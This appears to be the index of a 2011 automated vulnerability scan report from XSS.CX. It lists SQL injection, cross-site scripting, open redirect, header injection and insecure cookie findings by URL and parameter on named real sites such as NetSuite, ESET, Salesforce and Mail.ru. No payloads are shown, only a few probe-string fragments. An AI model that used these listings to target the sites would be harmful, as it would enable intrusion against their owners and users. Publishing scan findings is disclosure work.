CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Apr 26 12:49:31 CDT 2011.

XSS.CX Home | XSS.CX Research Blog
Loading

1. SQL injection

1.1. http://customer.kronos.com/user/managefavorites.asp [Referer HTTP header]

1.2. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

1.3. http://learn.shavlik.com/shavlik/index.cfm [m parameter]

1.4. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]

1.5. http://shopping.netsuite.com/app/site/query/additemtocart.nl [NLPromocode cookie]

1.6. http://shopping.netsuite.com/app/site/query/additemtocart.nl [NLVisitorId cookie]

1.7. http://shopping.netsuite.com/app/site/query/additemtocart.nl [Submit.y parameter]

1.8. http://shopping.netsuite.com/app/site/query/additemtocart.nl [__utmz cookie]

1.9. http://shopping.netsuite.com/app/site/query/additemtocart.nl [name of an arbitrarily supplied request parameter]

1.10. http://shopping.netsuite.com/app/site/query/additemtocart.nl [productId parameter]

1.11. http://shopping.netsuite.com/app/site/query/additemtocart.nl [promocode parameter]

1.12. http://shopping.netsuite.com/s.nl [NLShopperId cookie]

1.13. http://shopping.netsuite.com/s.nl [__utma cookie]

1.14. http://shopping.netsuite.com/s.nl [__utmc cookie]

1.15. http://shopping.netsuite.com/s.nl [promocode cookie]

1.16. https://www.depthsecurity.com/WebResource.axd [d parameter]

1.17. https://www.depthsecurity.com/WebResource.axd [t parameter]

1.18. http://www.eset.com/us/ [PHPSESSID cookie]

1.19. http://www.trucklist.ru/cars/undefined [REST URL parameter 1]

1.20. http://www.trucklist.ru/cars/undefined [REST URL parameter 2]

1.21. http://www.trucklist.ru/favicon.ico [REST URL parameter 1]

1.22. http://www.trucklist.ru/plugins/ajax/enums.php [REST URL parameter 3]

1.23. http://www.trucklist.ru/plugins/ajax/enums.php [name of an arbitrarily supplied request parameter]

1.24. http://www.trucklist.ru/vendors/calendar/super_calendar.js [REST URL parameter 3]

1.25. http://www.trucklist.ru/webroot/delivery/css/global.css [REST URL parameter 4]

1.26. http://www.trucklist.ru/webroot/delivery/js/global.js [REST URL parameter 4]

1.27. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js [REST URL parameter 4]

1.28. http://www.trucklist.ru/webroot/delivery/js/jquery.js [REST URL parameter 4]

1.29. http://www.trucklist.ru/webroot/delivery/js/jquery.json.js [REST URL parameter 4]

1.30. http://www.trucklist.ru/webroot/delivery/js/prototype.js [REST URL parameter 4]

1.31. http://www.trucklist.ru/webroot/delivery/js/scripts.js [REST URL parameter 4]

1.32. http://www.trucklist.ru/webroot/delivery/js/windows/javascripts/window.js [REST URL parameter 6]

1.33. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alert.css [REST URL parameter 6]

1.34. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alphacube.css [REST URL parameter 6]

1.35. http://www.trucklist.ru/webroot/delivery/js/windows/themes/default.css [REST URL parameter 6]

2. File path traversal

3. LDAP injection

4. Cross-site scripting (stored)

5. HTTP header injection

5.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout [REST URL parameter 1]

5.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

5.3. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru [REST URL parameter 2]

5.4. http://click-here-to-listen.com/players/iaPlay13.swf [REST URL parameter 1]

5.5. http://click-here-to-listen.com/players/iaPlay13.swf [REST URL parameter 2]

5.6. http://pretty.ru/favicon.ico [REST URL parameter 1]

5.7. http://www.instantengage.com/operator_status.php [on parameter]

5.8. https://www.salesforce.com/favicon.ico [REST URL parameter 1]

5.9. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

6. Cross-site scripting (reflected)

6.1. http://ads.adxpose.com/ads/ads.js [uid parameter]

6.2. http://an.yandex.ru/code/47934 [target-ref parameter]

6.3. http://an.yandex.ru/code/57617 [target-ref parameter]

6.4. http://an.yandex.ru/code/66894 [target-ref parameter]

6.5. http://ar.voicefive.com/b/rc.pli [func parameter]

6.6. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]

6.7. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]

6.8. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f [REST URL parameter 2]

6.9. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f [REST URL parameter 3]

6.10. https://customer.kronos.com/default.asp [rurl parameter]

6.11. http://demr.opt.fimserve.com/adopt/ [sz parameter]

6.12. http://desk.opt.fimserve.com/adopt/ [sz parameter]

6.13. http://ds.addthis.com/red/psi/sites/www.kronos.com/p.json [callback parameter]

6.14. http://event.adxpose.com/event.flow [uid parameter]

6.15. https://hourly.deploy.com/hmc/report/ ['"--> parameter]

6.16. https://hourly.deploy.com/hmc/report/ [name of an arbitrarily supplied request parameter]

6.17. https://hourly.deploy.com/hmc/report/ [nsextt parameter]

6.18. https://hourly.deploy.com/hmc/report/ [register parameter]

6.19. https://hourly.deploy.com/hmc/report/index.cfm ['"--> parameter]

6.20. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]

6.21. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]

6.22. https://hourly.deploy.com/hmc/report/index.cfm [name of an arbitrarily supplied request parameter]

6.23. https://hourly.deploy.com/hmc/report/index.cfm [nsextt parameter]

6.24. https://hourly.deploy.com/hmc/report/index.cfm [register parameter]

6.25. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042) [name of an arbitrarily supplied request parameter]

6.26. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) [name of an arbitrarily supplied request parameter]

6.27. http://ib.adnxs.com/ab [cnd parameter]

6.28. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard [mbox parameter]

6.29. http://kroogy.com/favicon.ico [REST URL parameter 1]

6.30. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

6.31. http://learn.shavlik.com/shavlik/index.cfm [m parameter]

6.32. http://mbox5.offermatica.com/m2/netsuite/mbox/standard [mbox parameter]

6.33. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]

6.34. http://ok.mail.ru/cookie-token.do [client_id parameter]

6.35. http://ok.mail.ru/cookie-token.do [remove parameter]

6.36. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

6.37. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [height parameter]

6.38. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [width parameter]

6.39. http://playaudiomessage.com/play.asp [f parameter]

6.40. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]

6.41. http://shopping.netsuite.com/s.nl [alias parameter]

6.42. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

6.43. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]

6.44. http://shopping.netsuite.com/s.nl/c.438708/n.1/sc.3/.f [REST URL parameter 2]

6.45. http://shopping.netsuite.com/s.nl/c.438708/n.1/sc.3/.f [name of an arbitrarily supplied request parameter]

6.46. http://tools.manageengine.com/forums/security-manager/forum.php [char parameter]

6.47. http://widgets.digg.com/buttons/count [url parameter]

6.48. https://www.controlscan.com/save_order.php [company parameter]

6.49. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]

6.50. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]

6.51. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]

6.52. http://www.google.com/search [tch parameter]

6.53. http://www.instantengage.com/open_chat.php [Email_To parameter]

6.54. http://www.instantengage.com/open_chat.php [Page_ID parameter]

6.55. http://www.integritydefender.com/buyerDetails.php [amount parameter]

6.56. http://www.integritydefender.com/buyerDetails.php [amount parameter]

6.57. http://www.integritydefender.com/buyerDetails.php [buyerId parameter]

6.58. http://www.integritydefender.com/buyerDetails.php [item_name parameter]

6.59. http://www.integritydefender.com/buyerDetails.php [item_name parameter]

6.60. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]

6.61. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]

6.62. http://www.stillsecure.com/m/ [comments parameter]

6.63. http://www.stillsecure.com/m/ [company parameter]

6.64. http://www.stillsecure.com/m/ [email parameter]

6.65. http://www.stillsecure.com/m/ [firstName parameter]

6.66. http://www.stillsecure.com/m/ [lastName parameter]

6.67. http://www.stillsecure.com/m/ [phone parameter]

6.68. http://www.trust-guard.com/Other/ImageResizer.php [src parameter]

6.69. https://hourly.deploy.com/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm [User-Agent HTTP header]

6.70. http://www.dmca.com/Protection/Status.aspx [Referer HTTP header]

6.71. http://www.eset.com/business/server-security/linux-file [Referer HTTP header]

6.72. http://www.eset.com/us [Referer HTTP header]

6.73. http://www.eset.com/us/ [Referer HTTP header]

6.74. http://www.eset.com/us/business/products [Referer HTTP header]

6.75. http://www.eset.com/us/business/server-security/linux-file [Referer HTTP header]

6.76. http://www.eset.com/us/home/smart-security [Referer HTTP header]

6.77. http://www.eset.com/us/store [Referer HTTP header]

6.78. http://www.eset.com/us/styles/store-new.css [Referer HTTP header]

6.79. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ [Referer HTTP header]

6.80. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

6.81. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

6.82. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

6.83. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

6.84. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

6.85. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

6.86. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

6.87. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

6.88. http://forums.manageengine.com/fbw [zdccn cookie]

6.89. http://forums.manageengine.com/fbw [zdccn cookie]

6.90. https://support.trust-guard.com/index.php [SWIFT_loginemail cookie]

6.91. https://support.trust-guard.com/visitor/index.php [SWIFT_sessionid80 cookie]

7. Flash cross-domain policy

7.1. http://195.68.160.134/crossdomain.xml

7.2. http://195.68.160.166/crossdomain.xml

7.3. http://195.68.160.167/crossdomain.xml

7.4. http://195.68.160.40/crossdomain.xml

7.5. http://195.68.160.95/crossdomain.xml

7.6. http://a.vimeocdn.com/crossdomain.xml

7.7. http://ad.afy11.net/crossdomain.xml

7.8. http://ad.doubleclick.net/crossdomain.xml

7.9. http://ajax.googleapis.com/crossdomain.xml

7.10. http://api.facebook.com/crossdomain.xml

7.11. http://api.flickr.com/crossdomain.xml

7.12. http://b.voicefive.com/crossdomain.xml

7.13. http://beacon.securestudies.com/crossdomain.xml

7.14. http://bs.mail.ru/crossdomain.xml

7.15. http://bs.yandex.ru/crossdomain.xml

7.16. http://cdn-01.yumenetworks.com/crossdomain.xml

7.17. http://click-here-to-listen.com/crossdomain.xml

7.18. http://counter.rambler.ru/crossdomain.xml

7.19. http://d1.openx.org/crossdomain.xml

7.20. http://d7.zedo.com/crossdomain.xml

7.21. http://event.adxpose.com/crossdomain.xml

7.22. http://games.mochiads.com/crossdomain.xml

7.23. http://goods.adnectar.com/crossdomain.xml

7.24. http://goods43.adnectar.com/crossdomain.xml

7.25. http://img.en25.com/crossdomain.xml

7.26. http://learn.shavlik.com/crossdomain.xml

7.27. http://m.adnxs.com/crossdomain.xml

7.28. http://map.media6degrees.com/crossdomain.xml

7.29. http://mbox5.offermatica.com/crossdomain.xml

7.30. http://pda.loveplanet.ru/crossdomain.xml

7.31. http://pixel.fetchback.com/crossdomain.xml

7.32. http://pixel.quantserve.com/crossdomain.xml

7.33. http://pl.yumenetworks.com/crossdomain.xml

7.34. http://player.vimeo.com/crossdomain.xml

7.35. http://playspal.com/crossdomain.xml

7.36. http://pretty.ru/crossdomain.xml

7.37. http://r2.mail.ru/crossdomain.xml

7.38. http://rbcgaru.hit.gemius.pl/crossdomain.xml

7.39. http://rs.mail.ru/crossdomain.xml

7.40. http://s0.2mdn.net/crossdomain.xml

7.41. http://search.twitter.com/crossdomain.xml

7.42. http://widgets.fotocash.ru/crossdomain.xml

7.43. http://www.instantengage.com/crossdomain.xml

7.44. http://cache.fimservecdn.com/crossdomain.xml

7.45. http://demr.opt.fimserve.com/crossdomain.xml

7.46. http://desk.opt.fimserve.com/crossdomain.xml

7.47. http://gomail.radar.imgsmail.ru/crossdomain.xml

7.48. http://googleads.g.doubleclick.net/crossdomain.xml

7.49. http://imagesrv.gartner.com/crossdomain.xml

7.50. http://img.dt00.net/crossdomain.xml

7.51. http://img.imgsmail.ru/crossdomain.xml

7.52. http://img.mail.ru/crossdomain.xml

7.53. http://js.dt00.net/crossdomain.xml

7.54. http://mail.radar.imgsmail.ru/crossdomain.xml

7.55. http://mail.ru/crossdomain.xml

7.56. http://odnoklassniki.ru/crossdomain.xml

7.57. http://oth.dt00.net/crossdomain.xml

7.58. http://server.iad.liveperson.net/crossdomain.xml

7.59. http://www.gartner.com/crossdomain.xml

7.60. https://www.salesforce.com/crossdomain.xml

7.61. http://www.livejournal.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

8.2. http://b.voicefive.com/clientaccesspolicy.xml

8.3. http://beacon.securestudies.com/clientaccesspolicy.xml

8.4. http://pl.yumenetworks.com/clientaccesspolicy.xml

8.5. http://s0.2mdn.net/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://demo.kayako.com/supportsuite/index.php

9.2. http://direct.yandex.ru/

9.3. http://direct.yandex.ru/pages/direct/_direct-1303387947.js

9.4. http://mail.ru/

9.5. http://my.webalta.ru/public/engine/templates.js

9.6. http://my.webalta.ru/public/engine/templates.js

9.7. http://odnoklassniki.ru/

9.8. http://pda.loveplanet.ru/

9.9. http://pretty.ru/

9.10. http://support.trust-guard.com/

9.11. http://support.trust-guard.com/index.php

9.12. http://vkontakte.ru/

9.13. http://www.integritydefender.com/account.php

9.14. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

9.15. http://www.ripoffreport.com/LoginPage.aspx

10. XML injection

10.1. http://api.facebook.com/restserver.php [format parameter]

10.2. http://api.flickr.com/services/feeds/photos_public.gne [format parameter]

10.3. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1]

10.4. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2]

10.5. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3]

10.6. http://www.netdiligence.com/xml_content/stories.xml [REST URL parameter 1]

11. SQL statement in request parameter

11.1. https://checkout.netsuite.com/core/media/media.nl

11.2. https://checkout.netsuite.com/core/styles/pagestyles.nl

11.3. https://checkout.netsuite.com/pages/portal/page_not_found.jsp

11.4. https://checkout.netsuite.com/s.nl

11.5. https://employer.unicru.com/asp/home/login.asp

11.6. https://hourly.deploy.com/hmc/report/

11.7. https://hourly.deploy.com/hmc/report/index.cfm

11.8. http://learn.shavlik.com/shavlik/index.cfm

11.9. https://secure.trust-guard.com/ResetPassword.php

11.10. https://support.trust-guard.com/index.php

11.11. https://support.trust-guard.com/visitor/index.php

12. SSL cookie without secure flag set

12.1. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

12.2. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

12.3. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

12.4. https://checkout.netsuite.com/core/

12.5. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

12.6. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

12.7. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

12.8. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

12.9. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

12.10. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

12.11. https://checkout.netsuite.com/core/styles/pagestyles.nl

12.12. https://checkout.netsuite.com/pages/portal/css/main.css

12.13. https://checkout.netsuite.com/pages/portal/page_not_found.jsp

12.14. https://checkout.netsuite.com/s.nl

12.15. https://customer.kronos.com/Default.asp

12.16. https://employer.unicru.com/asp/home/login.asp

12.17. https://employer.unicru.com/asp/home/login.asp

12.18. https://employer.unicru.com/asp/home/login.asp

12.19. https://employer.unicru.com/asp/home/login.asp

12.20. https://hourly.deploy.com/hmc/report/

12.21. https://hourly.deploy.com/hmc/report/index.cfm

12.22. https://secure.trust-guard.com/

12.23. https://secure.trust-guard.com/ResetPassword.php

12.24. https://support.comodo.com/

12.25. https://support.trust-guard.com/

12.26. https://support.trust-guard.com/index.php

12.27. https://support.trust-guard.com/index.php

12.28. https://support.trust-guard.com/visitor/index.php

12.29. https://www.fusionvm.com/FusionVM/

12.30. https://checkout.netsuite.com/s

12.31. https://customer.kronos.com/Default.asp

12.32. https://customer.kronos.com/user/forgotpassword.asp

12.33. https://customer.kronos.com/user/forgotusername.asp

12.34. https://customer.kronos.com/user/logindenied.asp

12.35. https://support.comodo.com/index.php

12.36. https://support.comodo.com/index.php

12.37. https://support.trust-guard.com/index.php

12.38. https://support.trust-guard.com/visitor/

13. Session token in URL

13.1. http://173.46.7.45/SightMaxAgentInterface/agentinterfacejsonp.svc/site/AddPageToVisitorAgentSession

13.2. http://173.46.7.45/SightMaxAgentInterface/agentinterfacejsonp.svc/site/GetVisitorAgentSessionMonitorCommand

13.3. http://demo.kayako.com/supportsuite/visitor/index.php

13.4. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard

13.5. http://mbox5.offermatica.com/m2/netsuite/mbox/standard

13.6. http://mbox9e.offermatica.com/m2/eset/mbox/standard

13.7. http://shopping.netsuite.com/app/site/query/additemtocart.nl

13.8. http://shopping.netsuite.com/s.nl

13.9. https://support.trust-guard.com/visitor/index.php

13.10. http://www.removeyourname.com/js/myEdgeProFormWidget.js

13.11. http://www.supportskins.com/support/visitor/index.php

14. Password field submitted using GET method

14.1. http://direct.yandex.ru/pages/direct/_direct-1303387947.js

14.2. https://hourly.deploy.com/hmc/report/

14.3. https://hourly.deploy.com/hmc/report/index.cfm

14.4. http://my.webalta.ru/public/engine/templates.js

14.5. http://my.webalta.ru/public/engine/templates.js

15. Open redirection

15.1. http://ad.trafficmp.com/a/bpix [r parameter]

15.2. http://an.yandex.ru/count/Ijtkb0MgGE440000ZhGnMDi4XP4H3fK2cm5kGoi1CuYjHd42YQMmoXgO1vsOQXQSkwfZHm6MfVcfmfgb3ijKagP3JWEAexCl0QMTAIkHj6-WPWoFiJVw7GAViYYJd0QJL9bNYw9wcWH2Z90r3A2GQXYdZoEZ0QG2V0q0 [name of an arbitrarily supplied request parameter]

15.3. http://www.instantengage.com/operator_status.php [on parameter]

15.4. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]

16. Cookie scoped to parent domain

16.1. http://sorry.google.com/sorry/Captcha

16.2. http://www.elineaccessories.com/

16.3. http://www.gartner.com/technology/contact/contact_gartner.jsp

16.4. http://www.internetreputationmanagement.com/

16.5. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/images/bg-tab.gif

16.6. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/js/Coolvetica_400.font.js

16.7. http://www.trucklist.ru/cars/trucks

16.8. http://ad.afy11.net/ad

16.9. http://ad.amgdgt.com/ads/

16.10. http://ad.trafficmp.com/a/bpix

16.11. http://ad.trafficmp.com/a/bpix

16.12. http://ad.trafficmp.com/a/bpix

16.13. http://ar.voicefive.com/b/wc_beacon.pli

16.14. http://ar.voicefive.com/bmx3/broker.pli

16.15. http://b.scorecardresearch.com/b

16.16. http://b.scorecardresearch.com/p

16.17. http://b.voicefive.com/b

16.18. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

16.19. http://core1.node15.top.mail.ru/counter

16.20. http://core1.node15.top.mail.ru/counter

16.21. http://core2.node12.top.mail.ru/counter

16.22. http://counter.rambler.ru/top100.cnt

16.23. http://counter.yadro.ru/hit

16.24. http://d7.zedo.com/img/bh.gif

16.25. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter

16.26. http://goods.adnectar.com/analytics/get_avia_js

16.27. http://ib.adnxs.com/ab

16.28. http://ib.adnxs.com/pxj

16.29. http://id.google.com/verify/EAAAADz5CbNokYbOxZux8yNUhyk.gif

16.30. http://id.google.com/verify/EAAAAP8sqKb20XMZzt0hJR6mFcY.gif

16.31. http://idcs.interclick.com/Segment.aspx

16.32. http://l.azjmp.com/f.php

16.33. http://m.adnxs.com/msftcookiehandler

16.34. http://map.media6degrees.com/orbserv/aopix

16.35. http://mc.yandex.ru/watch/57617

16.36. http://pixel.fetchback.com/serve/fb/pdc

16.37. http://pixel.quantserve.com/pixel

16.38. http://pixel.rubiconproject.com/tap.php

16.39. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil

16.40. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

16.41. http://pogoda.webalta.ru/

16.42. http://r2.mail.ru/b12179277.gif

16.43. http://r2.mail.ru/b12179279.gif

16.44. http://r2.mail.ru/b12179280.gif

16.45. http://r2.mail.ru/b12201458.png

16.46. http://r2.mail.ru/b12526055.gif

16.47. http://r2.mail.ru/b12526056.jpg

16.48. http://r2.mail.ru/b12526057.jpg

16.49. http://r2.mail.ru/b12526058.jpg

16.50. http://r2.mail.ru/b12526059.jpg

16.51. http://r2.mail.ru/b12526060.jpg

16.52. http://r2.mail.ru/b12526061.jpg

16.53. http://r2.mail.ru/b12526062.jpg

16.54. http://r2.mail.ru/b12526063.jpg

16.55. http://r2.mail.ru/b12526064.jpg

16.56. http://r2.mail.ru/b12526065.gif

16.57. http://r2.mail.ru/b12526191.gif

16.58. http://r2.mail.ru/b12526192.gif

16.59. http://r2.mail.ru/b12526193.gif

16.60. http://r2.mail.ru/b12526194.gif

16.61. http://r2.mail.ru/b12526208.gif

16.62. http://r2.mail.ru/b12526210.gif

16.63. http://r2.mail.ru/b12527647.gif

16.64. http://r2.mail.ru/b12529050.jpg

16.65. http://r2.mail.ru/b12530142.jpg

16.66. http://r2.mail.ru/b12530159.jpg

16.67. http://r2.mail.ru/b12531249.jpg

16.68. http://r2.mail.ru/b12531545.jpg

16.69. http://r2.mail.ru/b12531624.jpg

16.70. http://r2.mail.ru/b12532203.jpg

16.71. http://r2.mail.ru/b12752186.jpg

16.72. http://r2.mail.ru/b12752583.jpg

16.73. http://r2.mail.ru/b12752584.jpg

16.74. http://r2.mail.ru/b12752585.jpg

16.75. http://r2.mail.ru/b12752586.jpg

16.76. http://r2.mail.ru/b12855502.png

16.77. http://r2.mail.ru/b12887675.jpg

16.78. http://r2.mail.ru/b12887676.jpg

16.79. http://r2.mail.ru/b12887677.jpg

16.80. http://r2.mail.ru/b12961140.jpg

16.81. http://r2.mail.ru/b12961154.jpg

16.82. http://r2.mail.ru/b12961373.jpg

16.83. http://r2.mail.ru/b12962356.jpg

16.84. http://r2.mail.ru/b12963308.jpg

16.85. http://r2.mail.ru/b12965362.jpg

16.86. http://r2.mail.ru/b12968616.jpg

16.87. http://r2.mail.ru/b12979027.jpg

16.88. http://r2.mail.ru/b13039712.jpg

16.89. http://r2.mail.ru/b13044176.jpg

16.90. http://r2.mail.ru/b13049054.jpg

16.91. http://r2.mail.ru/b13050852.jpg

16.92. http://r2.mail.ru/b13057590.swf

16.93. http://r2.mail.ru/b13058787.jpg

16.94. http://r2.mail.ru/b13058840.jpg

16.95. http://r2.mail.ru/b13058851.jpg

16.96. http://r2.mail.ru/b13058852.jpg

16.97. http://r2.mail.ru/b13058968.jpg

16.98. http://r2.mail.ru/b13059223.jpg

16.99. http://r2.mail.ru/b13059860.jpg

16.100. http://r2.mail.ru/b13060405.jpg

16.101. http://r2.mail.ru/b13060487.jpg

16.102. http://r2.mail.ru/b13061099.jpg

16.103. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif

16.104. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif

16.105. http://segment-pixel.invitemedia.com/pixel

16.106. http://server.iad.liveperson.net/hc/48536788/

16.107. http://sorry.google.com/sorry/

16.108. http://storage.trafic.ro/js/trafic.js

16.109. http://top5.mail.ru/counter

16.110. http://www.kayako.com/

16.111. http://www.kayako.com/styles/

16.112. http://www.kayako.com/styles/graphics/loader.white.gif

16.113. http://www.livejournal.com/tools/endpoints/journalspotlight.bml

16.114. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388

17. Cookie without HttpOnly flag set

17.1. http://173.46.7.45/SightMaxAgentInterface/Monitor.smjs

17.2. http://ads.adxpose.com/ads/ads.js

17.3. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

17.4. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

17.5. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

17.6. https://checkout.netsuite.com/core/

17.7. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

17.8. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

17.9. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

17.10. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

17.11. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

17.12. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

17.13. https://checkout.netsuite.com/core/styles/pagestyles.nl

17.14. https://checkout.netsuite.com/pages/portal/css/main.css

17.15. https://checkout.netsuite.com/pages/portal/page_not_found.jsp

17.16. https://checkout.netsuite.com/s.nl

17.17. http://customer.kronos.com/

17.18. http://customer.kronos.com/user/managefavorites.asp

17.19. https://customer.kronos.com/Default.asp

17.20. http://demo.kayako.com/supportsuite/index.php

17.21. http://demo.kayako.com/supportsuite/visitor/index.php

17.22. https://employer.unicru.com/asp/home/login.asp

17.23. https://employer.unicru.com/asp/home/login.asp

17.24. https://employer.unicru.com/asp/home/login.asp

17.25. https://employer.unicru.com/asp/home/login.asp

17.26. http://event.adxpose.com/event.flow

17.27. http://hostpapasupport.com/

17.28. https://hourly.deploy.com/hmc/report/

17.29. https://hourly.deploy.com/hmc/report/index.cfm

17.30. http://partner-support.wiki.zoho.com/

17.31. http://partners.criticalwatch.com/

17.32. http://playaudiomessage.com/play.asp

17.33. https://secure.trust-guard.com/

17.34. https://secure.trust-guard.com/ResetPassword.php

17.35. http://shopping.netsuite.com/app/site/hit/tracker.nl

17.36. http://shopping.netsuite.com/app/site/query/additemtocart.nl

17.37. http://shopping.netsuite.com/core/styles/pagestyles.nl

17.38. http://shopping.netsuite.com/s.nl

17.39. http://sorry.google.com/sorry/Captcha

17.40. https://support.comodo.com/

17.41. https://support.trust-guard.com/

17.42. https://support.trust-guard.com/index.php

17.43. https://support.trust-guard.com/index.php

17.44. https://support.trust-guard.com/visitor/index.php

17.45. http://t5.trackalyzer.com/trackalyze.asp

17.46. http://tengrinews.kz/tag/891/

17.47. http://www.customermagnetism.com/

17.48. http://www.fusionvm.com/

17.49. http://www.gartner.com/technology/contact/contact_gartner.jsp

17.50. http://www.integritydefender.com/

17.51. http://www.internetreputationmanagement.com/

17.52. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/images/bg-tab.gif

17.53. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/js/Coolvetica_400.font.js

17.54. http://www.iveco-ptc.spb.ru/

17.55. http://www.netsuite.com/app/site/hit/tracker.nl

17.56. http://www.smpone.com/images/captcha.php

17.57. http://www.supportskins.com/support/visitor/index.php

17.58. http://www.tresware.com/images/captcha.php

17.59. http://www.trucklist.ru/cars/trucks

17.60. http://www.trust-guard.com/

17.61. http://www.trust-guard.com/PCI-scanning-s/39.htm

17.62. http://ad.afy11.net/ad

17.63. http://ad.amgdgt.com/ads/

17.64. http://ad.trafficmp.com/a/bpix

17.65. http://ad.trafficmp.com/a/bpix

17.66. http://ad.trafficmp.com/a/bpix

17.67. http://ad.yieldmanager.com/pixel

17.68. http://an.yandex.ru/code/47934

17.69. http://an.yandex.ru/code/57617

17.70. http://an.yandex.ru/code/66894

17.71. http://ar.voicefive.com/b/wc_beacon.pli

17.72. http://ar.voicefive.com/bmx3/broker.pli

17.73. http://b.dclick.ru/image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554

17.74. http://b.scorecardresearch.com/b

17.75. http://b.scorecardresearch.com/p

17.76. http://b.voicefive.com/b

17.77. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

17.78. http://bw.pronto.ru/brick/5/167/36/30/125/&rnd=538045407

